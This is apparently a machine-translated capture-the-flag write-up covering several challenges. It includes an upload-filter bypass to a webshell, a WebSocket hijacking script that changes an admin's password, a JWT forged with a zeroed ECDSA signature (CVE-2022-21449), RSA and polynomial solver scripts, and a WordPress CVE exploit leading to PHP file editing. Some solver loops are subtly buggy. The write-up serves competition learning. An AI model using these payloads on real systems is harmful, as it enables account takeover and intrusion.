Article directory
MISC check-in
Flag value:
flag{we1come_t0_qwb_s6}
Strong network pioneer rcefile
After many upload tests, it was found that only files in image format can be uploaded, files in php, php5 and other formats cannot be uploaded, but it can be bypassed by using
. It can be uploaded (you need to verify the file type, just change it to jpg format) and connect successfully
Ant sword successfully connected
Turn up the directory and find the flag
flag value:
flag{5d3c9f27-e8fe-4e5d-9a2d-4e907a32adec}
Web baby web
First register an account, it is a chat robot, follow the prompts to send help
with two functions, one is changepw to change the password, and the other is to submit a vulnerability to the administrator. I
tried XSS, and it seems that it is useless. Burp captures packets. It is websocket communication
Baidu searched The websocket hijacking vulnerability
is combined with changing the password + administrator identity. Based on the experience of doing the questions, it is guessed that it is a way to change the administrator password to obtain administrator privileges.
So there is a direction, very similar to Csrf, and we start to prepare.
We need to find a way to let the administrator click on the interface we constructed to change the password
<script>
var url="ws://127.0.0.1:8888/bot"; //这里的8888是题目上给的端口
var ws=new WebSocket(url);
ws.onopen=function(e){
ws.send("changepw 12345")};
</script>
Put it on the external network server, and submit it to the administrator through bugreport on the vulnerability submission interface, so that the administrator
visits this page locally and sends an instruction to change the password.
Then we log in to the administrator account and it is successful.
There is another layer, buy a hint, find out that it is source code,
conduct code audit, and burp capture packets
Successfully get the flag
flag value:
flag{617a3096-f514-4e7d-9472-e98924fbbec7}
strong network pioneer asr
import gmpy2
n= 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
a=gmpy2.iroot(n, 2)
print(a)
First use gmpy2 to extract the square of n
to get a (the standard n)
a=2872432989693854281918578458293603200587306199407874717707522587993136874097838265650829958344702997782980206004276973399784460125581362617464018665640001
and then use yafu to decompose this number
Get
p = 260594583349478633632570848336184053653
q = 223213222467584072959434495118689164399
run the script to get m
import gmpy2
from Crypto.Util.number import *
p = 260594583349478633632570848336184053653
q = 223213222467584072959434495118689164399
#r = 218566259296037866647273372633238739089
#s = 225933944608558304529179430753170813347
e=3
phi=p*(p-1)*q*(q-1)
d=inverse(e,phi)
n=p*p*q*q
c=945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
m=pow(c,d,n)
#mm1 = 1248984295174749683050825615411469211061247361327166117293032213981703895553936323127707213641064897178474925251326429742817744892644764737209862
flag = m.to_bytes(64,byteorder='big')
print(m)
flag value
flag{Fear_can_hold_you_prisoner_Hope_can_set_you_free}
Crypto myJWT
JWT and ECDSA signature
TOKEN are composed of three parts, base64 of heaerd, base64 of payload, Signature (signature)
According to the given source code, we can see that the header content has not changed. In the payload, we need to make username equal to administrator and have administrator privileges at the same time ()
According to the token it gives, we base64 decode it to get the header and payload:
{"typ":"JWT","alg":"myES"}
{"iss":"qwb","name":"administrator","admin":false,"exp":1659241547664}
Change the payload to
{"iss":"qwb","name":"administrator","admin":true,"exp":165924154766400}
At the same time, according to the source code and the characteristics of ecdsa, we changed the third part of jwt to base64, which used to be garbled 'AAA='
to get a new token
eyJ0eXAiOiJKV1QiLCJhbGciOiJteUVTIn0=.eyJpc3MiOiJxd2IiLCJuYW1lIjoiYWRtaW5pc3RyYXRvciIsImFkbWluIjp0cnVlLCJleHAiOjE2NTkyNDE1NDc2NjQwMH0=.AAA= 
Flag value
flag{cve-2022-21449_Secur1ty_0f_c0de_1mplementation}
Strong net pioneer polydiv
task.py shows that there are two layers of decryption on the server. The first layer is the known sha256 and part of the plaintext. Find the first four plaintexts and directly blast them to get them;
import hashlib
ss = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
txt2 = "T9up62MRPNfO53WN"
sha256enc="ab79fb51140b7edd2b9010e0c5a4f4fe3ff73c68c17f5fb1264de03b0388cda7"
key=txt2
for a in ss:
for b in ss:
for c in ss:
for d in ss:
code = a+b+c+d
encinfo = hashlib.sha256(bytes( (code+key).encode() ) ).hexdigest()
if encinfo == sha256enc:
print(code)
print(encinfo)
break
The second layer is polynomial calculation of degree 40, which also adopts the idea of blasting.
The functions and definitions in Poly2.py give us the multiplication and addition of polynomials. After a simple analysis, we can get that the multiplication and division of polynomials in the question only retain the monomial with a coefficient of 1. Using the third definition of the polynomial given, at the same time The highest number of observed questions is 14, and the highest number of b(x) is 7. Basically, all b(x) can be solved by blasting to the seven-layer cycle here to get a
single script for b(x);
class Polynomial2():
'''
模二多项式环,定义方式有三种
一是从高到低给出每一项的系数
>>> Polynomial2([1,1,0,1])
x^3 + x^2 + 1
二是写成01字符串形式
>>> Polynomial2('1101')
x^3 + x^2 + 1
三是直接给出系数为1的项的阶
>>> Poly([3,1,4])
x^4 + x^3 + x
>>> Poly([]) # 加法元
0
>>> Poly(0) # 乘法元
1
>>> Poly(1,2) * Poly(2,3)
x^5 + x^3
'''
def __init__(self, ll):
if type(ll) == str:
ll = list(map(int, ll))
self.param = ll[::-1]
self.ones = [i for i in range(len(self.param)) if self.param[i] == 1] # 系数为1的项的阶数列表
self.Latex = self.latex()
self.b = ''.join([str(i) for i in ll]) # 01串形式打印系数
self.order = 0 # 最高阶
try:
self.order = max(self.ones)
except:
pass
def format(self, reverse=True):
'''
格式化打印字符串
默认高位在左
reverse = False时,低位在左
但是注意定义多项式时只能高位在右
'''
r = ''
if len(self.ones) == 0:
return '0'
if reverse:
return (
(' + '.join(f'x^{
i}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace('x^1 ', 'x ')).strip()
return ((' + '.join(f'x^{
i}' for i in self.ones) + ' ').replace('x^0', '1').replace('x^1 ', 'x ')).strip()
def __call__(self, x):
'''
懒得写了,用不到
'''
print(f'call({
x})')
def __add__(self, other):
'''
多项式加法
'''
a, b = self.param[::-1], other.param[::-1]
if len(a) < len(b): a, b = b, a
for i in range(len(a)):
try:
a[-1 - i] = (b[-1 - i] + a[-1 - i]) % 2
except:
break
return Polynomial2(a)
def __mul__(self, other):
'''
多项式乘法
'''
a, b = self.param[::-1], other.param[::-1]
r = [0 for i in range(len(a) + len(b) - 1)]
for i in range(len(b)):
if b[-i - 1] == 1:
if i != 0:
sa = a + [0] * i
else:
sa = a
sa = [0] * (len(r) - len(sa)) + sa
# r += np.array(sa)
# r %= 2
r = [(r[t] + sa[t]) % 2 for t in range(len(r))]
return Polynomial2(r)
def __sub__(self, oo):
# 模二多项式环,加减相同
return self + oo
def __repr__(self) -> str:
return self.format()
def __str__(self) -> str:
return self.format()
def __pow__(self, a):
# 没有大数阶乘的需求,就没写快速幂
t = Polynomial2([1])
for i in range(a):
t *= self
return t
def latex(self, reverse=True):
'''
Latex格式打印...其实就是给两位及以上的数字加个括号{}
'''
def latex_pow(x):
if len(str(x)) <= 1:
return str(x)
return '{' + str(x) + '}'
r = ''
if len(self.ones) == 0:
return '0'
if reverse:
return (' + '.join(f'x^{
latex_pow(i)}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace(' x^1 ',
' x ').strip()
return (' + '.join(f'x^{
latex_pow(i)}' for i in self.ones) + ' ').replace('x^0', '1').replace(' x^1 ',
' x ').strip()
def __eq__(self, other):
return self.ones == other.ones
def __lt__(self, other):
return max(self.ones) < max(other.ones)
def __le__(self, other):
return max(self.ones) <= max(other.ones)
def Poly(*args):
'''
另一种定义方式
Poly([3,1,4]) 或 Poly(3,1,4)
'''
if len(args) == 1 and type(args[0]) in [list, tuple]:
args = args[0]
if len(args) == 0:
return Polynomial2('0')
ll = [0 for i in range(max(args) + 1)]
for i in args:
ll[i] = 1
return Polynomial2(ll[::-1])
PP = Polynomial2
P = Poly
# 简化名称,按长度区分 P 和 PP
if __name__ == '__main__':
pr = Poly([14,13,12,8,5,2,0])
pa = Poly([7,6,4,3,2])
pc = Poly([6,4,0])
for a in range(8):
bx = Poly(a)
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
bx = Poly(a,b)
ccx = bx * pa
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
bx = Poly(a,b,c)
ccx= bx * pa
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
for d in range(c+1,8):
bx = Poly(a,b,c,d)
ccx = bx * pa
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
for d in range(c+1,8):
for e in range(d+1,8):
bx = Poly(a,b,c,d,e)
ccx = bx * pa
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
for d in range(c+1,8):
for e in range(d+1,8):
for f in range(e+1,8):
ccx = bx * pa
bx = Poly(a,b,c,d,e,f)
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
for d in range(c+1,8):
for e in range(d+1,8):
for f in range(e+1,8):
for g in range(f+1,8):
ccx = bx * pa
bx = Poly(a,b,c,d,e,f,g)
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a+1,8):
for c in range(b+1,8):
for d in range(c+1,8):
for e in range(d+1,8):
for f in range(e+1,8):
for g in range(f+1,8):
for h in range(g+1,8):
ccx = bx * pa
bx = Poly(a,b,c,d,e,f,g,h)
if(bx * pa + pc == pr):
print(bx)
break
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
for f in range(e + 1, 8):
for g in range(f + 1, 8):
for h in range(g + 1, 8):
for i in range(h+1,8):
ccx = bx * pa
bx = Poly(a, b, c, d, e, f, g, h,i)
if (bx * pa + pc == pr):
print(bx)
break
There are 40 loops in the title, manual input is too slow, write an automatic submission script:
import hashlib
from pwn import *
ss = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
def talk_with_server(known, shaenc):
for a in ss:
for b in ss:
for c in ss:
for d in ss:
code = a + b + c + d
# print(type(code))
encinfo = hashlib.sha256(bytes((code + known).encode())).hexdigest()
if encinfo == shaenc:
print('code', code)
print(encinfo)
return code
class Polynomial2():
'''
模二多项式环,定义方式有三种
一是从高到低给出每一项的系数
>>> Polynomial2([1,1,0,1])
x^3 + x^2 + 1
二是写成01字符串形式
>>> Polynomial2('1101')
x^3 + x^2 + 1
三是直接给出系数为1的项的阶
>>> Poly([3,1,4])
x^4 + x^3 + x
>>> Poly([]) # 加法元
0
>>> Poly(0) # 乘法元
1
>>> Poly(1,2) * Poly(2,3)
x^5 + x^3
'''
def __init__(self, ll):
if type(ll) == str:
ll = list(map(int, ll))
self.param = ll[::-1]
self.ones = [i for i in range(len(self.param)) if self.param[i] == 1] # 系数为1的项的阶数列表
self.Latex = self.latex()
self.b = ''.join([str(i) for i in ll]) # 01串形式打印系数
self.order = 0 # 最高阶
try:
self.order = max(self.ones)
except:
pass
def format(self, reverse=True):
'''
格式化打印字符串
默认高位在左
reverse = False时,低位在左
但是注意定义多项式时只能高位在右
'''
r = ''
if len(self.ones) == 0:
return '0'
if reverse:
return (
(' + '.join(f'x^{
i}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace('x^1 ', 'x ')).strip()
return ((' + '.join(f'x^{
i}' for i in self.ones) + ' ').replace('x^0', '1').replace('x^1 ', 'x ')).strip()
def __call__(self, x):
'''
懒得写了,用不到
'''
print(f'call({
x})')
def __add__(self, other):
'''
多项式加法
'''
a, b = self.param[::-1], other.param[::-1]
if len(a) < len(b): a, b = b, a
for i in range(len(a)):
try:
a[-1 - i] = (b[-1 - i] + a[-1 - i]) % 2
except:
break
return Polynomial2(a)
def __mul__(self, other):
'''
多项式乘法
'''
a, b = self.param[::-1], other.param[::-1]
r = [0 for i in range(len(a) + len(b) - 1)]
for i in range(len(b)):
if b[-i - 1] == 1:
if i != 0:
sa = a + [0] * i
else:
sa = a
sa = [0] * (len(r) - len(sa)) + sa
# r += np.array(sa)
# r %= 2
r = [(r[t] + sa[t]) % 2 for t in range(len(r))]
return Polynomial2(r)
def __sub__(self, oo):
# 模二多项式环,加减相同
return self + oo
def __repr__(self) -> str:
return self.format()
def __str__(self) -> str:
return self.format()
def __pow__(self, a):
# 没有大数阶乘的需求,就没写快速幂
t = Polynomial2([1])
for i in range(a):
t *= self
return t
def latex(self, reverse=True):
'''
Latex格式打印...其实就是给两位及以上的数字加个括号{}
'''
def latex_pow(x):
if len(str(x)) <= 1:
return str(x)
return '{' + str(x) + '}'
r = ''
if len(self.ones) == 0:
return '0'
if reverse:
return (' + '.join(f'x^{
latex_pow(i)}' for i in self.ones[::-1]) + ' ').replace('x^0', '1').replace(' x^1 ',
' x ').strip()
return (' + '.join(f'x^{
latex_pow(i)}' for i in self.ones) + ' ').replace('x^0', '1').replace(' x^1 ',
' x ').strip()
def __eq__(self, other):
return self.ones == other.ones
def __lt__(self, other):
return max(self.ones) < max(other.ones)
def __le__(self, other):
return max(self.ones) <= max(other.ones)
def Poly(*args):
'''
另一种定义方式
Poly([3,1,4]) 或 Poly(3,1,4)
'''
if len(args) == 1 and type(args[0]) in [list, tuple]:
args = args[0]
if len(args) == 0:
return Polynomial2('0')
ll = [0 for i in range(max(args) + 1)]
for i in args:
ll[i] = 1
return Polynomial2(ll[::-1])
PP = Polynomial2
P = Poly
# 简化名称,按长度区分 P 和 PP
def get_bx(r1, a1, c1):
# pr = Poly([14,13,11,10,9,3,1,0])
# pa = Poly([7,3,1,0])
# pc = Poly([6,5,2,1])
# r = {}
# a = {}
# c = {}
# lenR = input("R len")
# for i in range(int(lenR)):
# r[i] = input()
# lenA = input("A len")
# for i in range(int(lenA)):
# a[i] = input()
# lenC = input('C len')
# for i in range(int(lenC)):
# c[i] = input()
pr = Poly(r1)
pa = Poly(a1)
pc = Poly(c1)
print(pr)
for a in range(8):
bx = Poly(a)
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
bx = Poly(a, b)
ccx = bx * pa
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
bx = Poly(a, b, c)
ccx = bx * pa
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
bx = Poly(a, b, c, d)
ccx = bx * pa
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
bx = Poly(a, b, c, d, e)
ccx = bx * pa
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
for f in range(e + 1, 8):
bx = Poly(a, b, c, d, e, f)
ccx = bx * pa
bx = Poly(a, b, c, d, e, f)
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
for f in range(e + 1, 8):
for g in range(f + 1, 8):
bx = Poly(a, b, c, d, e, f, g)
ccx = bx * pa
bx = Poly(a, b, c, d, e, f, g)
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
for f in range(e + 1, 8):
for g in range(f + 1, 8):
for h in range(g + 1, 8):
bx = Poly(a, b, c, d, e, f, g, h)
ccx = bx * pa
bx = Poly(a, b, c, d, e, f, g, h)
if (bx * pa + pc == pr):
print(bx)
return bx
for a in range(8):
for b in range(a + 1, 8):
for c in range(b + 1, 8):
for d in range(c + 1, 8):
for e in range(d + 1, 8):
for f in range(e + 1, 8):
for g in range(f + 1, 8):
for h in range(g + 1, 8):
for i in range(h + 1, 8):
# bx = Poly(a, b, c, d, e, f,g,h,i)
ccx = bx * pa
bx = Poly(a, b, c, d, e, f, g, h, i)
if (bx * pa + pc == pr):
print(bx)
return bx
tableR = ['x^14 ', 'x^13 ', 'x^12 ', 'x^11 ', 'x^10 ', 'x^9 ', 'x^8 ', 'x^7 ', 'x^6 ', 'x^5 ', 'x^4 ', 'x^3 ', 'x^2 ',
'x ', '1']
tableR1 = ['x^14', 'x^13', 'x^12', 'x^11', 'x^10', 'x^9', 'x^8', 'x^7', 'x^6', 'x^5', 'x^4', 'x^3', 'x^2',
'x', '1']
tableA = ['x^7 ', 'x^6 ', 'x^5 ', 'x^4 ', 'x^3 ', 'x^2 ', 'x ', '1']
tableA1 = ['x^7', 'x^6', 'x^5', 'x^4', 'x^3', 'x^2', 'x', '1']
tableC = ['x^6 ', 'x^5 ', 'x^4 ', 'x^3 ', 'x^2 ', 'x ', '1']
tableC1 = ['x^6', 'x^5', 'x^4', 'x^3', 'x^2', 'x', '1']
def parse_polyR(r, ply):
ply = str(ply)
for i in range(15):
if ply.startswith(tableR[i]) and not ply.endswith(tableR1[i]):
if ply.startswith(tableR[i]):
r[i] = 14 - i
ply = ply[len(tableR[i]) + 2:]
if ply.endswith(tableR1[i]):
r[i] = 14 - i
def parse_polyA(a, ply):
ply = str(ply)
for i in range(8):
if ply.startswith(tableA[i]) and not ply.endswith(tableA1[i]):
if ply.startswith(tableA[i]):
a[i] = 7 - i
ply = ply[len(tableA[i]) + 2:]
if ply.endswith(tableA1[i]):
a[i] = 7 - i
def parse_polyC(c, ply):
ply = str(ply)
for i in range(7):
if ply.startswith(tableC[i]) and not ply.endswith(tableC1[i]):
if ply.startswith(tableC[i]):
c[i] = 6 - i
ply = ply[len(tableC[i]) + 2:]
if ply.endswith(tableC1[i]):
c[i] = 6 - i
if __name__ == '__main__':
a1 = {
}
r1 = {
}
c1 = {
}
p = remote("182.92.223.176", 25342)
p.recvuntil("sha256(XXXX+")
given = str(p.recv(16).strip())
print('given', given, type(given), len(given))
given = given[2:-1]
print('given', given, type(given), len(given))
p.recv(5)
sha256enc = str(p.recv(
64))
sha256enc = sha256enc[2:-1]
print(given, sha256enc)
print(p.recvuntil(" XXXX:"))
XXXX = talk_with_server(given, sha256enc)
print(XXXX)
p.sendline(str(XXXX))
j = 0
while j < 45:
rx = str(p.recvline())
print(rx)
if j > 0:
print(str(rx[9:-3]))
parse_polyR(r1, str(rx[9:-3]))
else:
print(str(rx[10:-3]))
parse_polyR(r1, str(rx[10:-3]))
ax = str(p.recvline())
print(ax)
print(str(ax[9:-3]))
cx = str(p.recvline())
print(cx)
print(str(cx[9:-3]))
j += 1
parse_polyA(a1, str(ax[9:-3]))
parse_polyC(c1, str(cx[9:-3]))
print('rx:', type(r1.values()), list(r1.values()))
print('ax-:', a1.values())
print('cx-:', c1.values())
p.recvline()
bx = get_bx(list(r1.values()), list(a1.values()), list(c1.values()))
print(bx)
p.sendline(str(bx))
print(p.recvline())
print('done', j)
a1 = {
}
r1 = {
}
c1 = {
}
Flag value
flag{c0923e5c-805c-42e3-91c3-160dceb41979
WEB Crash
The prompt flag is on the 504 page, and the response time of the webpage should be timed out. I took the online payload and changed it.
Then use a few more repeaters, repeat multiple times and it will be successful
Flag value
flag{467e093c-08a5-4925-bdb8-cfa9eaa4506b}
Strong Network Pioneer WP_um
After entering the topic, there are some prompts. After installing Wordpress, use the wpscan tool to scan
and scan to get the user name, MaoGePaMao
The prompt password during installation is such a rule
Exploiting Vulnerability CVE-2022-0799
Get the password: MaoGeYaoQiFeiLa
to enter the background
After getting the password, enter the background management, modify one of the php files, save and access
